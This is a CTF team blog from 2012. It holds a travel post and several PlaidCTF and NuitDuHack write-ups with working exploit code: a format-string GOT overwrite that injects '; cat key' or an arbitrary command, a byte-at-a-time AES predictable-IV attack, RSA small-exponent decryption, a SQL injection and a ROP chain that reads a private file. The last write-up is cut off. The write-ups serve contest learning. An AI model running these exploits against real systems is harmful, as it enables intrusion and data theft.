Leet More

Russian Spy in Santa Barbara

zyx2145 — Sun, 13 May 2012 05:13:42 +0000

Last few months I have spent in Boston and recently had an opportunity to come to awesome Santa Barbara. Santa Barbara is a motherland not only of the longest (or one of the longest) an American television soap opera, which was very well known in Russia in 90s, but also University of California Santa Barbara (UCSB).

How most of you know, UCSB, and particular the Department of Computer Science, organizes International Capture The Flag (also known as the iCTF), one of the oldest ctf contest. For our team also, it is one of the first CTF in which we started to participate, and there are few curious moments connected with it which happened last years: 2010 and 2011. So, because all of that I was very happy to come to UCSB and personally meet Professor Giovanni Vigna and his team, but first things first.

First of all, I want to show you a campus of UCSB which is huge and beautiful. The such concentration of skaters, bicycles and beautiful girls I had never seen before anywhere ).

I was literally waiting about 1 minute for crossing bicycle track because of bicycles’ traffic! Incredible!

This is a view which students of UCSB can see every morning!

and also you can walk around…

“Harold Frank Hall ” is a place where Security Lab is located, also called Engineering I.

How you can see at a map below, a campus is really huge.

Inside the Lab I met a lot of interesting and enthusiastic people )

A heart of lab:

After an excursion in UCSB Security Lab (and after I copied all flags for next iCTF 2012 for sure xDDD ), Giovanni and I went to Lastline’s office. Lastline is a security startup which is focused on research and development anti-malware solution “Previct” (you can find more information by link).

There I met another team with whom had a lunch and interesting conversation.

I think that anti-malware researchers and foosball are two inseparable things because almost in every virus lab which I’d seen I saw foosball table. Sometimes I think that the best place to recruit anti-malware analyst is foosball bar )) So, these guys are not exception! After lunch we had a short game (I’m not going to tell you who won, but you know).

I really like campus of UCSB, and came there again in another day just to skating around and to enjoy the atmosphere of this place.

Finally, I want to say thanks for inviting to Professor Giovanni Vigna and his team. I really enjoyed to meet you and to spend time in awesome Santa Barbara! Looking forward to meet you again.

SIMD [250] (Pirating)

hellman — Tue, 01 May 2012 11:28:03 +0000

After examining some code retrieved by our operative we are unsure whether it was written by an evil genius or a google employee. We will let you decide.

Summary: linux x64 binary, obfuscated xor

The main code is rather simple:

.text:0000004006D0 main      proc near
.text:0000004006D0           mov     [rsp+var_18], rbx
.text:0000004006D5           mov     [rsp+var_10], rbp
.text:0000004006DA           mov     rbx, rsi
.text:0000004006DD           mov     [rsp+var_8], r12
.text:0000004006E2           sub     rsp, 38h
.text:0000004006E6           cmp     edi, 1
.text:0000004006E9           jle     short loc_40075A
.text:0000004006EB           mov     r12, [rsi+8]
.text:0000004006EF           mov     rdi, r12        
.text:0000004006F2           call    _strlen           ; strlen(argv[1])
.text:0000004006F7           cmp     rax, 1Fh          ; 31
.text:0000004006FB           jnz     short loc_40075A
.text:0000004006FD           mov     rcx, rsp
.text:000000400700           mov     rsi, r12
.text:000000400703           mov     edi, 8
.text:000000400708           mov     edx, offset mess
.text:00000040070D           call    frob              ; encrypt
.text:000000400712           mov     rdi, cs:expected
.text:000000400719           mov     ecx, 20h
.text:00000040071E           mov     rsi, rsp
.text:000000400721           repe cmpsb                ; compare result with hardcoded data
.text:000000400723           jz      short loc_400748
.text:000000400725           mov     edi, offset s   ; "Invalid passcode"
.text:00000040072A           call    _puts
.text:00000040072F loc_40072F:                             ; CODE XREF: main+88j
.text:00000040072F           xor     eax, eax
.text:000000400731           mov     rbx, [rsp+38h+var_18]
.text:000000400736           mov     rbp, [rsp+38h+var_10]
.text:00000040073B           mov     r12, [rsp+38h+var_8]
.text:000000400740           add     rsp, 38h
.text:000000400744           retn

Basically just some encryption and result compare. The interesting part is frob function. It has a bunch of SSE instructions, processing the encryption.

I decided to see what the result is and I patched the binary to output the result of the encryption:

.text:000000000040070D                 call    frob
.text:0000000000400712                 mov     rdi, cs:expected
.text:0000000000400719                 mov     ecx, 20h        ; addr
.text:000000000040071E                 xor     rax, rax
.text:0000000000400721                 mov     al, 1
.text:0000000000400723                 xor     rdi, rdi
.text:0000000000400726                 inc     rdi
.text:0000000000400729                 mov     rsi, rsp        ; encrypted data
.text:000000000040072C                 mov     rdx, rcx        ; len = 32
.text:000000000040072F                 syscall                 ; write syscall
.text:0000000000400731                 retn

Let’s see:

$ ./psimd "`perl -e 'print "A"x1 . "B"x30;'`" | xxd
0000000: 77de 77f3 823e 3815 01c2 2a91 441c 2926  w.w..>8...*.D.)&
0000010: 8ca8 c669 42c6 8cda 8e25 03e7 ebf6 b23b  ...iB....%.....;
$ ./psimd "`perl -e 'print "A"x2 . "B"x29;'`" | xxd
0000000: 77dd 77f3 823e 3815 01c2 2a91 441c 2926  w.w..>8...*.D.)&
0000010: 8ca8 c669 42c6 8cda 8e25 03e7 ebf6 b23b  ...iB....%.....;
$ ./psimd "`perl -e 'print "A"x3 . "B"x28;'`" | xxd
0000000: 77dd 74f3 823e 3815 01c2 2a91 441c 2926  w.t..>8...*.D.)&
0000010: 8ca8 c669 42c6 8cda 8e25 03e7 ebf6 b23b  ...iB....%.....;

Hmm it’s very likely to be just XOR. Let’s check:

# get hardcoded data from binary
$ dd bs=1 if=simd of=data skip=$(rax2 0x2458) count=32
32+0 records in
32+0 records out
32 bytes (32 B) copied, 0.000348474 s, 91.8 kB/s
 
$ ./psimd "`perl -e 'print "A"x31;'`" >ENCA
 
$ xor -f ENCA -s $(perl -e 'print "A"x32') >key
$ xor -f key -f data
4rnt_v3ct0r_1nstruct10ns_c00l?!A

Indeed! The flag: 4rnt_v3ct0r_1nstruct10ns_c00l?!

PlaidCTF 2012 – RSA [200] (Password Guessing)

hellman — Tue, 01 May 2012 08:56:15 +0000

We recently intercepted a plethora of robot transmissions but they are all encrypted with some strange scheme we just can’t quite figure out. Can you crack it?

Summary: small public exponent: 3

We are given just two files: enc.dat and id-rsa.pub. Let’s extract RSA public key:

$ openssl rsa -pubin -in id-rsa.pub -text
Public-Key: (4096 bit)
Modulus:
    00:b0:a1:f3:90:ac:d3:d4:3b:47:d3:9f:13:26:62:
    f6:9c:15:89:25:d9:28:71:e4:78:69:e2:84:1a:91:
    7c:20:d5:10:24:31:b9:a9:78:14:58:d8:40:fd:29:
    57:78:15:a4:16:12:d6:87:a3:48:7d:26:fb:ae:25:
    6f:15:d4:74:0c:34:59:1b:64:6a:bc:cc:b1:a2:7a:
    cd:e2:99:b3:e7:16:00:85:7b:45:5c:28:36:60:e0:
    45:5c:68:ff:45:c0:64:4c:fe:c2:11:d7:f5:1a:16:
    c8:2e:91:d7:86:d9:2c:79:9f:b3:cb:48:f9:2d:e3:
    42:ba:70:dd:82:13:05:6b:31:4a:8d:51:da:94:93:
    cf:1b:86:ec:15:fd:f0:3e:04:6e:76:d3:f1:a1:ad:
    0a:ab:b6:84:ce:5d:15:7e:39:98:28:a6:3a:5a:f5:
    92:02:28:bb:5e:a1:e6:6b:8f:ea:a3:cc:bb:af:f5:
    55:e3:46:79:77:30:dd:fc:1c:4c:f4:a9:dd:40:65:
    88:62:93:48:c4:c2:92:65:df:9e:2c:3d:02:55:8b:
    e5:e3:5c:b2:77:f4:e7:ac:7b:51:58:ef:39:03:a3:
    96:48:63:71:02:9e:54:a3:45:29:2a:ba:47:49:9f:
    1c:26:7e:68:0a:e7:38:19:5f:d5:af:2a:80:75:93:
    98:90:f5:d6:9e:6b:3e:94:e3:e5:60:86:1a:a6:c6:
    c6:9d:a8:24:05:db:a2:18:2e:66:ec:ff:6a:8a:9c:
    df:5a:d5:22:6f:07:3e:7d:52:5e:05:0f:dd:77:e0:
    bb:18:91:a4:9e:fe:c2:d3:67:a6:93:d2:a6:79:9d:
    0d:46:67:95:3d:4f:3d:de:c1:6a:c1:5b:b4:cf:60:
    25:ea:58:ec:b6:df:a5:72:31:6d:a0:8d:31:06:07:
    39:73:32:2a:e7:59:74:46:f2:fd:30:43:df:6e:1d:
    60:4c:6a:1f:0e:59:47:3d:9b:c1:82:d4:ec:6f:c4:
    58:8f:1c:6b:2a:a4:76:87:6a:84:b2:d4:e0:d4:59:
    10:39:91:18:d7:e1:e2:0d:cc:27:70:3f:2b:d3:e9:
    af:72:2f:37:a7:67:3b:15:d6:74:92:28:62:c8:4d:
    00:fc:2f:c7:dd:dd:c9:15:c4:69:3f:cb:0b:17:89:
    e9:dc:bd:72:ac:04:65:9e:7c:18:dc:f3:62:54:76:
    00:40:40:2b:fc:ef:11:b8:a3:ef:9c:8b:dd:ba:aa:
    8d:14:c6:e8:f5:18:a7:0b:03:6d:20:6b:80:9c:d9:
    b3:b5:1a:1e:c0:13:2d:ac:e9:6d:ca:94:51:f3:4c:
    38:ab:84:ed:47:5e:7d:94:fb:e9:ff:c0:07:f2:d1:
    48:60:bd
Exponent: 3 (0x3)

Oh, the exponent is very small – 3. If the message is rather small and it wasn’t padded correctly, we can decrypt it! Let’s see:

Bigger m -> bigger k. Let’s bruteforce k until is a cube. Then the secret message will be a cuberoot of that:

import gmpy
from libnum import *
 
N = long('00b0...0bd', 16)
orig = s2n(open("enc.dat").read().rstrip())
 
c = orig
while True:
    m = gmpy.root(c, 3)[0]
    if pow(m, 3, N) == orig:
        print "pwned", n2s(m)
        break
    c += N

$ time py rsa.py 
pwned 
Didn't I tell you everything would work out in the end? Brixby gave me the password to the secure server: 56c812da9a3955e3c81453eb035b3d37b3f1bfe407ef701d09cf68dd4bb335b1
 
 
real	0m44.679s
user	0m44.615s
sys	0m0.008s

The flag: 56c812da9a3955e3c81453eb035b3d37b3f1bfe407ef701d09cf68dd4bb335b1

PlaidCTF 2012 – Encryption Service [300] (Password Guessing)

hellman — Tue, 01 May 2012 08:33:01 +0000

We found the source code for this robot encryption service, except the key was redacted from it. The service is currently running at 23.21.15.166:4433

Summary: IV predict, byte-by-byte bruteforce

This challenge was based on a vulnerable crypto scheme with predictable (known) IV’s. First IV is random, but all the subsequent messages are encrypted with previous ciphertexts as IV’s (it’s important that we know IV before sending a message to encrypt).

Here’s client handler:

        iv = os.urandom(16)
        self.wfile.write(iv)
        while True:
            data = self.rfile.read(4)
            if not data:
                break
 
            try:
                length = struct.unpack('I', data)[0]
                if length > 4096:
                    break
                data = self.rfile.read(length)
                data += PROBLEM_KEY
                ciphertext = encrypt(data, iv)
                iv = ciphertext[-16:]
                self.wfile.write(struct.pack('I', len(ciphertext)))
                self.wfile.write(ciphertext)
            except:
                break

After we know some IV, we send this IV to encrypt and we get a ciphertext = AES(IV ^ IV) = AES(0). And the next IV is accurately AES(0), and the cool thing is that we can repeat it many times and IV will be the same.

After fixing the IV, we can bruteforce byte-by-byte the appended flag:
First encrypt

"X"*15 --> AES(IV, "X*15" + Flag[0]) + …

Then encrypt different chars until we get the same block as the first one:

"X"*15 + "A" --> AES(IV, "X*15" + "a") + …

"X"*15 + "B" --> AES(IV, "X*15" + "b") + …

…

Thus we can get the first byte of the flag, and so on.

Here’s exploit:

from sock import Sock
from struct import pack, unpack
 
ALPHA = "_abcdefghijklmnopqrstuvwxyz"
 
def send_msg(f, m):
	data = pack("I", len(m))
	data += m
	f.send(data)
 
	dlen = unpack("I", f.read_nbytes(4))[0]
	data = f.read_nbytes(dlen)
	return data, data[-16:]
 
f = Sock("23.21.15.166", 4433)
iv = f.read_nbytes(16)
 
key = ""
for index in xrange(len(key)+1, 99999):
	pad_len = 16 - (index % 16)
	msg = "A" * pad_len
 
	s, iv = send_msg(f, iv)
	s, iv = send_msg(f, msg)
 
	block_number = index / 16
	good_block = s[block_number * 16 : (block_number + 1) * 16]
	print "ENC", msg, "(%d)" % len(msg), "=", good_block[:16].encode("hex")
 
	for c in ALPHA:
		s, iv = send_msg(f, iv)
		msg = "A" * pad_len + key + c
		s, iv = send_msg(f, msg)
		block = s[block_number * 16 : (block_number + 1) * 16]
		if block == good_block:
			key += c
			print "Found", index-1, "char:", c, "key:", key
			break
	else:
		print "Finished\n"
		print "KEY:", key
		break

$ py predict_iv.py 
ENC AAAAAAAAAAAAAAA (15) = f1a42e850b6c7abaa7b53223470505c3
Found 0 char: p key: p
ENC AAAAAAAAAAAAAA (14) = 5edf4afc7bf0765bddba811a9b3adad6
Found 1 char: r key: pr
ENC AAAAAAAAAAAAA (13) = df41943880e2b461c31590e293202159
Found 2 char: e key: pre
ENC AAAAAAAAAAAA (12) = d9859acf09e49d50ada8e938c345f28d
Found 3 char: d key: pred
ENC AAAAAAAAAAA (11) = e5a8b4ee0ba44f72abeec767de8f1092
Found 4 char: i key: predi
...
ENC AAAAA (5) = be6ff4d4c812a4f2a3050e289bbbb98c
Found 26 char: o key: predictable_ivs_are_dangero
ENC AAAA (4) = 2b07c150317a5ac936817896c3846f24
Found 27 char: u key: predictable_ivs_are_dangerou
ENC AAA (3) = 17b9dad0127147163265627f1b5efeac
Found 28 char: s key: predictable_ivs_are_dangerous
ENC AA (2) = e681d4d39dee05ddf6c16e0ba9598288
Finished
 
KEY: predictable_ivs_are_dangerous

The flag: predictable_ivs_are_dangerous

PlaidCTF 2012 – Nuclear Launch Detected [150] (Password Guessing)

hellman — Tue, 01 May 2012 08:07:17 +0000

Our spies intercepted communications and a file between 5 of the top 10 robo-generals and their nuclear bomb server. We must recover the final launch code from the 5 robo-general’s secret codes, so we can stop the detonation!

Summary: Shamir’s Secret Sharing

Here we have a pcap file where 5 communications take place. Each looks like

> *** Welcome to Remote Nuclear Bomb Launch System ***
> # Enter the launch code: 
< (4, 944438008684116...6L)
> !!! Success !!! Bomb has been launched!

It seems that 5 secret codes together allow to launch the bomb. Such things can be done with some secret sharing scheme. Google for some and Shamir’s Secret Sharing is the easiest to find. In wiki’s example only 3 keys are needed, so we need to extend it to 5.

…

Here’s the code:

from libnum import *
 
pairs = []
pairs += [(4, 9444...806)]
pairs += [(2, 8577...243)]
pairs += [(1, 3320...109)]
pairs += [(5, 6259...452)]
pairs += [(3, 6454...858)]
 
p = int(open("p.txt").read())
 
res = 0
for i, pair in enumerate(pairs):
	x, y = pair
	top = 1
	bottom = 1
	for j, pair in enumerate(pairs):
		if j == i:
			continue
		xj, yj = pair
		top = (top * (-xj)) % p
		bottom = (bottom * (x - xj)) % p
	res += (y * top * invmod(bottom, p)) % p
	res %= p
 
print res
print n2s(res)

$ py shamir.py 
723126740974638694358413759917266643240116870314821228110113
s3cr3t_5h4r1n9_i5_H4RD_!!

The flag: s3cr3t_5h4r1n9_i5_H4RD_!!

PlaidCTF 2012 – Format [99] (Pwnables)

zyx2145 — Tue, 01 May 2012 03:36:28 +0000

Up on a hill, far away, sits the robot king of old. While he was once great, he recently has seemed to just offer simple challenges. Vanquish him and bring honor to your team!

Summary: rand guessing, format string exploitation

File is x86 ELF which consists plenty of format string vulnerabilities.

But to exploit them we have to solve some issues.

First of all, we have to send password. It is kept in file as plain text:

“2ipzLTxTGOtJE0Um”

Second, we have to guess pseudo random number which is generated from time.

time((time_t *)&current_time);
current_time /= 60;
srand(current_time);
rnd_number = rand();
//	…
printf("Name: ");
fflush(stdout);
fgets(szName, 256, stdin);
printf("Guess: ");
fflush(stdout);
fgets(szGuess, 32, stdin);
our_number = atoi(szGuess);
if ( our_number != rnd_number )
{
    puts("Wrong value!");
    exit(1);
}

There are two the easiest ways to guess.

To write small program like:

#include 
void main(void)
{
  time_t curr_time;
  srand(time(&curr_time)/60);
  printf("%d", rand());
}

and to execute it before starting a target program.

If we are going to write exploit at python we can use ctypes lib (hellman’s idea =) )

LIBC = ctypes.cdll.LoadLibrary("./libc.so.6")
t = LIBC.time(0)/60
LIBC.srand(t)
return str(LIBC.rand())

So, now we are ready to exploit target program. Finally, we decide to use a printf (0x080489FD) after snprintf (0x080489F1). Rewrite free@got with system@libc, which address can be calculated from a memory leak and an offset from given library.

There are two exploits:
By zyx2145:

#!/usr/bin/python
import os
import subprocess 
import sys
import struct
import ctypes
 
def get_rnd_str():
   LIBC = ctypes.cdll.LoadLibrary("./libc.so.6") 
   t = LIBC.time(0)/60
   LIBC.srand(t)
   return str(LIBC.rand())
 
################################## get real address of system ##########################
PW = "2ipzLTxTGOtJE0Um\n"
addr = 0x8049E30 # atoi address
system_org = 0x00039100 # system offset in libc.so.6
atoi_org = 0x0002D870 # atoi offset in libc.so.6
buf = PW + struct.pack(", addr) + "XXXX%19$s\n"
buf += get_rnd_str()
 
p2 = subprocess.Popen(["./problem"],  stdout=subprocess.PIPE, stdin=subprocess.PIPE)
p2.stdin.write(buf)
result = p2.communicate()[0]
system = struct.unpack(",result[result.find("XXXX")+4:result.find("XXXX")+8])[0]
 
####################################### execute cat key ################################
buf = PW
addr = 0x08049e18 # address of free GOT
system = system + (system_org-atoi_org) # calculate real system address
high = system >> 16
low = system & 0xFFFF
start = 8
if high < low:
   buf += struct.pack(", addr+2) + struct.pack(", addr)+\
          "%%" + str(high - start) + "c%%21$hn"+\
          "%%" + str(low - high) + "c%%22$hn"+"; cat key\n"
else:
   buf += struct.pack(", addr) + struct.pack(", addr+2)+\
          "%%" + str(low - start) + "c%%21$hn"+\
          "%%" + str(high - low) + "c%%22hn"+"; cat key\n"
buf += get_rnd_str()
 
p3 = subprocess.Popen(["./problem"],  stdout=subprocess.PIPE, stdin=subprocess.PIPE)
p3.stdin.write(buf)
result = p3.communicate()[0]
result = result.replace(' ','')
print result[result.find("Bye,")+8:]

By hellman:

#!/usr/bin/env python
#-*- coding:utf-8 -*-
 
from inc import *
from libformatstr import *
import ctypes
 
PW = "2ipzLTxTGOtJE0Um\n"
 
def do_fmt(fmt):
	LIBC = ctypes.cdll.LoadLibrary("./libc.so.6") 
	t = LIBC.time(0)/60
	LIBC.srand(t)
	rnd = LIBC.rand()
 
	f = Sock("23.20.104.208", 56345, 10)
 
	f.read_until(": ")
	f.send(PW)
 
	f.read_until(": ")
	f.send(fmt + "\n")
 
	f.read_until(": ")
	f.send(str(rnd) + "\n")
 
	return f.read_until("Bye") + f.read_one()
 
def read_dword(addr):
	res = do_fmt(pack(", addr) + '0000%19$s')
	#print res
	res = res[res.find("playing, ") + 9:]
	if res[4:8] != "0000":
		print "FAIL"
	res = res[8:]
	start = unpack(", res[:4])[0]
	return start
 
system = 0xf7ec8450
#start = read_dword(0x08049e14)
#diff1 = 0x39450 - 0x16bc0
#system = start + diff1
 
low = system & 0xffff
high = system >> 16
start = 8
 
addr = 0x8049E18
r = pack(", addr)
r += pack(", addr+2)
r += "%%" + str(low - start) + "c"
r += "%%21$hn"
r += "%%" + str(high - low) + "c"
r += "%%22$hn"
r += "; " + sys.argv[1]
print r
 
LIBC = ctypes.cdll.LoadLibrary("./libc.so.6") 
t = LIBC.time(0)/60
LIBC.srand(t)
rnd = LIBC.rand()
f = Sock("23.20.104.208", 56345, 10)
f.read_until(": ")
f.send(PW)
f.read_until(": ")
f.send(r + "\n")
f.read_until(": ")
f.send(str(rnd) + "\n")
 
s = ""
while not f.eof:
	try:
		s += f.read_one()
	except:
		pass
 
s = s[s.find("not found")+9:]
s = s[s.find("not found")+9:]
print s

Well done =)

PlaidCTF 2012 – Bouncer [250] (Practical Packets)

zyx2145 — Mon, 30 Apr 2012 17:50:33 +0000

In a recent battle we took an enemy robot hostage and examined his operating system. During the examination we found a piece of robot malware that we don’t quite understand. Can you enumerate its targets?
This challenge was made by our friends at ManTech. If you enjoyed it, you might be interested in working for them.

Summary: unpack x64 ELF, bot request analysis.

A file is packed x64 ELF. An unpack algorithm is easy. Set hardware breakpoint at read/write encrypted memory (for example 0x01001A0) and find that program unpack itself to allocated memory.

An unpacking procedure :

Allocated memory:

If you dump allocated memory after unpacking you will find unpacked file. Even though, unfortunately, all references to curl functions (and any lib functions) is invalid, unpacked file is small, and we can easily analyze it.

First of all, check strings:

It looks like parts of HTTP request strings. So, the file seems to be a bot which does two HTTP requests. A first request performs to take a port number for a second request.

port2 = answer*4 + 0×400

After that, program calculates a hash from id = “1337” and create a base64 string from this hash.

The hash is calculated by easy formula from id. It xors each byte of id with 2 and base64s result.

Then, the program constructs and performs a second request:

There is an example of second request:

http://174.129.48.200:/?id=1337&hash=MzExNQ%3D%3D

Because we know that we can put any id in request. We tried easy sqli and it worked:

GET /?id=>1′%20or%201%20–&hash=PDMlIm1wIjMiLy8= HTTP/1.1
Host: 174.129.48.200:5555
Accept: */*

Notice: a server incorrectly processes space symbol, so we should send
id = “>1′%20or%201%20–&” but
hash = calc_hash(“>1′ or 1 –”)

Key: Pwning1$m0reFunWhenTargetsBounce
Exploit here.

Программа RuCTF

vos — Thu, 19 Apr 2012 06:46:57 +0000

NuitDuHack 2012 Prequals – Web3.ndh

hellman — Sun, 25 Mar 2012 23:00:48 +0000

Our spy thinks that Sciteek staff is aware about the mole inside
their building. He is trying to read a private file named “sciteek-private.txt”
located at sciteek.nuitduhack.com:4005. Please find the .ndh attached, if
you are sucessfull, reply with a message entitled “complex remote service”.

Of course, your efforts will be rewarded with $2500. Maybe you will find
pieces of informations about the mole.

Piotr

Web3.ndh
NDH Virtual Machine

Summary: rop exploit in a VM, avoiding hardcoded stack cookie

Previous challenges contained some interesting strings, so let’s check for strings in this binary too:

$ strings web3.ndh
.NDH
HTTP/1.0 200 OK
Content-Type : text/HTML
Content-Length : 70
<html><center><b>Exploit Me if you can ;)b>html>center>
GET 
Cannot create server

Hmm it’s some kind of a HTTP server. Also there’s only “GET” in strings, not “HTTP/1.1″ or other http markers. Looks like it’s wants a request only to start with “GET “. Let’s check:

$ ./vmndh -file web3.ndh 
GET blabla
HTTP/1.0 200 OK
Content-Type : text/HTML
Content-Length : 70
 
<html><center><b>Exploit Me if you can ;)b>html>center>

Let’s try to overflow the request:

$ perl -e 'print "GET " . "A"x1024;' | ./vmndh -file web3.ndh
$

Just an exit! Let’s debug it:

$ ./vmndh -file web3.ndh -debug
[Console]#> run
...
0x81e8 > syscall (r0 = 0x0003 - read)
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[SYSCALL output]: 517
0x81e9 > ret
0x84d8 > mov r0, r1
0x84dc > addl r8, #0x200
0x84e1 > pop r1
0x84e3 > cmpl r1, #0xbeef
0x84e8 > jz 0x01
0x84eb > end

r8 is actually like a esp on x86 – it’s a stack pointer. Adding 0×200 to it is like closing the stackframe.
The next word on the stack is compared to 0xbeef – it must be just a stack cookie!
Let’s check:

$ perl -e 'print "GET " . "\xef\xbe"x512;' | ./vmndh -file web3.ndh
[!] Segfault 0xbeef (out of range)

Yes, it’s jumping to 0xbeef! 0×200 is 512, let’s pad it:

$ perl -e 'print "GET " . "A"x508 . "\xef\xbe" . "\x42\x41";' | ./vmndh -file web3.ndh
[!] Segfault 0x4142 (opcode unknown)

So, we can jump to an arbitrary address. Let’s find out our buffer address:

$ ./vmndh -file web3.ndh -debug
[Console]#> bp 0x81e8
Breakpoint set in 0x81e8
[Console]#> run
...
[BreakPoint 1 - 0x81e8]
0x81e8 > syscall (r0 = 0x0003 - read)
GET blabla
[SYSCALL output]: 11
[Console]#> show sp
7bf2: d8 84 47 45 54 20 62 6c 61 62
# this is:  G  E  T     b  l  a  b

The address is 0x7bf8. Let’s check for NX:

$ perl -e 'print "GET " . "A"x508 . "\xef\xbe" . "\xf8\x7b";' | ./vmndh -file web3.ndh
[!] Segfault 0x7bf8 (opcode unknown)
$ perl -e 'print "GET " . "A"x508 . "\xef\xbe" . "\xf8\x7b";' | nc sci.nuitduhack.com 4005
[!] Segfault 0x7bf8 (NX bit)

Ahh, there’s NX bit enabled on the server! So we have to make a ROP payload. It’s easy to find some cool gadgets:

[Console]#> dis 81D2:6
0x81d2: movb r0, #0x02  <- SYS_OPEN
0x81d6: syscall
0x81d7: ret
 
[Console]#> dis 8229:7
0x8229: pop r3  \
0x822b: pop r2   |-> arguments for syscalls
0x822d: pop r1  /
0x822f: ret
 
[Console]#> dis 8198:5
0x8198: pop r1
0x819a: pop r0  <- syscall number
0x819c: ret

And here’s self-explaining exploit:

import sys
from struct import pack
 
fname_addr = 0x7bf8
buf = 0x0000
 
pop_r1_r0 = 0x8198
pop_r0 = 0x819a
pop_args = 0x8229
sys_open = 0x81d2
syscall = 0x81D6 
 
# fill stackframe
s = "GET sciteek-private.txt\x00".ljust(512, "A")
# stack cookie
s += "\xef\xbe"
 
# close(3)
s += pack(", pop_r1_r0)
s += pack(", 3)  # FD = 3
s += pack(", 5)  # SYS_CLOSE
s += pack(", syscall)
 
# open(filename, O_RDONLY, 0);
s += pack(", pop_args)
s += pack(", 0)          # FLAGS
s += pack(", 0)          # O_RDONLY
s += pack(", fname_addr) # FILENAME
 
s += pack(", sys_open) # FILENAME
 
# read(3, buf, 1000)
s += pack(", pop_args)
s += pack(", 1000) # SIZE
s += pack(", buf)  # BUF
s += pack(", 3)    # FD
 
s += pack(", pop_r0)
s += pack(", 3)    # SYS_READ
 
s += pack(", syscall)
 
# write(1, buf, size)
s += pack(", pop_args)
s += pack(", 1000) # SIZE
s += pack(", buf)  # BUF
s += pack(", 1)    # STDOUT
 
s += pack(", pop_r0)
s += pack(", 4)    # SYS_READ
 
s += pack(", syscall) # FILENAME
 
sys.stdout.write(s)

Run it:

$ py pay.py | nc sci.nuitduhack.com 4005
 
Dear Patrick,
 
We found many evidences proving there is a mole inside our company who is selling confidential materials to our main competitor, Megacortek. We have very good reasons to believe that Walter Smith have sent some emails to a contact at Megacortek, containing confidential information.
 
However, these emails seems to have been encrypted and sometimes contain images or audio files which are apparently not related with our company or our business
, but one of them contains an archive with an explicit name.
 
We cannot stand this situation anymore, and we should take actions to make Mr Smith leave the company: we can fire this guy or why not call the FBI to handle this case as it should be.
 
Sincerely,
 
David Markham.
[!] Segfault 0x0000 (NX bit)
$

Challenge solved!

NuitDuHack 2012 Prequals – executable1.ndh

hellman — Sun, 25 Mar 2012 23:00:20 +0000

Meanwhile, we got
fresh news from our mystery guy. He came along with an intersting binary file.
It just looks like an executable, but it is not ELF nor anything our experts
would happen to know or recognize. Some of them we quite impressed by your skills
and do think you may be able to succeed here. I attached the file, if you discover
anything, please send me an email entitled “Strange binary file”.

This will be rewarded, as usual. By the way, your account has just been credited
with $100.

executable1.ndh
NDH Virtual Machine

Summary: simple crackme on NDH VM

Here we have a binary for NDH VM. Let’s run it:

$ ./vmndh -file executable1.ndh 
Sciteek protected storage #1
Enter your password: test
Bad password

Let’s trace it:

0x83ff > syscall (r0 = 0x0003 - read)
TEST
[SYSCALL output]: 5
0x8400 > mov r0, r2
0x8404 > call 0xfee0
0x82e8 > mov r7, r0
0x82ec > movl r6, #0x840d
0x82f1 > call 0xfd0e
0x8003 > push r1
0x8006 > push r2
0x8009 > movl r1, #0x0
0x800e > movl r2, #0x0
0x8013 > mov r1, [r0]
0x8017 > test r1, r1
0x801a > inc r2
0x801c > inc r0
0x801e > jnz 0xfff2
0x8013 > mov r1, [r0]
0x8017 > test r1, r1
0x801a > inc r2
0x801c > inc r0
0x801e > jnz 0xfff2
...
0x8013 > mov r1, [r0]
0x8017 > test r1, r1
0x801a > inc r2
0x801c > inc r0
0x801e > jnz 0xfff2
0x8021 > dec r2
0x8023 > mov r0, r2
0x8027 > pop r2
0x8029 > pop r1
0x802b > ret
0x82f5 > cmpb r0, #9  <- length compare
0x82f9 > jz 0x05
0x82fc > call 0xffd4

It’s easy to see that the length of the input is compared to 9. So the password’s length is 8 (plus one for “\n” char):

$ ./vmndh -file executable1.ndh -debug
[Console]#> bp 0x82f5
Breakpoint set in 0x82f5
[Console]#> run
...
0x83ff > syscall (r0 = 0x0003 - read)
testtest
...
 
[BreakPoint 1 - 0x82f5]
0x82f5 > cmpb r0, #9
[Console]#> 
0x82f9 > jz 0x05
[Console]#> 
0x8301 > mov r0, [r7]
[Console]#> 
0x8305 > mov r1, [r6]
[Console]#> dis 8301:100
0x8301: mov r0, [r7]
0x8305: mov r1, [r6]
0x8309: xor r0, r1
0x830d: cmpb r0, #78   <--- 1
0x8311: jz 0x0005 //8319
0x8314: call 0xffbc //82d4
0x8318: end
0x8319: inc r7
0x831b: inc r6
0x831d: mov r0, [r7]
0x8321: mov r1, [r6]
0x8325: xor r0, r1
0x8329: cmpb r0, #44   <--- 2
0x832d: jz 0x0005 //8335
0x8330: call 0xffa0 //82d4
0x8334: end
0x8335: inc r7
0x8337: inc r6
0x8339: mov r0, [r7]
0x833d: mov r1, [r6]
0x8341: xor r0, r1
0x8345: cmpb r0, #73   <--- 3
0x8349: jz 0x0005 //8351
0x834c: call 0xff84 //82d4
0x8350: end
0x8351: inc r7
0x8353: inc r6
0x8355: mov r0, [r7]
0x8359: mov r1, [r6]
0x835d: xor r0, r1
0x8361: cmpb r0, #6b   <--- 4
0x8365: jz 0x0005 //836d
0x8368: call 0xff68 //82d4
0x836c: end
0x836d: inc r7
0x836f: inc r6
0x8371: mov r0, [r7]
0x8375: mov r1, [r6]
0x8379: xor r0, r1
0x837d: cmpb r0, #61   <--- 5
0x8381: jz 0x0005 //8389
0x8384: call 0xff4c //82d4
0x8388: end
0x8389: inc r7
0x838b: inc r6
0x838d: mov r0, [r7]
0x8391: mov r1, [r6]
0x8395: xor r0, r1
0x8399: cmpb r0, #3e   <--- 6
0x839d: jz 0x0005 //83a5
0x83a0: call 0xff30 //82d4
0x83a4: end
